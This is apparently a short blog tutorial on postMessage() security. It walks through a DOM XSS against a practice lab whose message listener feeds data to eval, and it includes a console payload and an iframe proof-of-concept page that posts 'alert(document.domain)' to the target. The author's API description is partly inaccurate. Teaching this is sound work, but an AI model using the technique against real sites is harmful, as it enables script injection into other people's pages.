postMessage() security

Sumeet darekar
3 min readApr 30, 2024

--

postMessage() method

This method enables communication between two pages iff they originates from same protocol , port Number. It provides secure mechanism for communication if set properly.

In communication two methods are used generally :

  1. postMessage() : sends data
  2. addEventListener() : Listen for data

Syntax

  1. postMessage() :
postMessage(message, targetOrigin)
postMessage(message, targetOrigin,transfer)

message => data/payload you want to send to other windows.

targetOrigin => Origin of target which will get the message if target does not match with Origin then message won’t be send, or “*” can be specify as targetOrigin which means target window can have any origin.

2. addEventListener() :

addEventListener("message",function ()=>{
//whatever contend
}, true/false)

message => data/payload send from the other window

function => tells what action will be perform when data/payload is received.

More info :

https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage

Where is the Bug

Firstly, to exploit postMessage bug application should use web messaging. If application is using web messaging then the listener ( addEventListener ) should be identified.

Tool to Identify listeners :

postMessage extension created by frans rosen :

Crome :

https://github.com/fransr/postMessage-tracker

Firefox [forked from fransr]:

https://github.com/sumeet-darekar/postMessage-tracker

vulnerabilities that can be found in postMessage are : XSS , Inforamation Disclosure , Authentication misconf and many more

Example : Describing Bug

https://xss-lab-brown.vercel.app/

This application is vulnerable to poseMessage() XSS, So let’s exploit it

First identify if their is any listener on application using above extension

Yes their is a addEventListener() method in javascript, lets analyse it

So, the application is taking our payload/data and putting in eval function for further analysis.As our payload/data is ending up in eval function so let’s run javascript there.

Open console by pressing ‘Esc’ button then send malicious postMessage() payload.

By using alert() we can pop-up a alert which show that we can run javascript on the application.

payload = window.postMessage('alert(document.domain)','*')

now, exploiting the vulnerability by using iframe() on replit.com

Code to exploit :

<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>replit</title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>

<body>
<script>
function exploit(){
payload = "alert(document.domain)"
document.getElementById("target").contentWindow.postMessage(payload, "*")
}

</script>
Hello world
<iframe src="https://xss-lab-brown.vercel.app/" id="target" onload="exploit()">
<script src="script.js"></script>
</body>

</html>

More Resources :

https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
https://www.yeswehack.com/learn-bug-bounty/introduction-postmessage-vulnerabilities
https://payatu.com/blog/postmessage-vulnerabilities/

More practise labs :

https://public-firing-range.appspot.com/dom/index.html
https://github.com/payatu/vuln-nodejs-app

sayonara ^_^

--

--

Sumeet darekar
Sumeet darekar

Written by Sumeet darekar

Passionate about security and api tech

No responses yet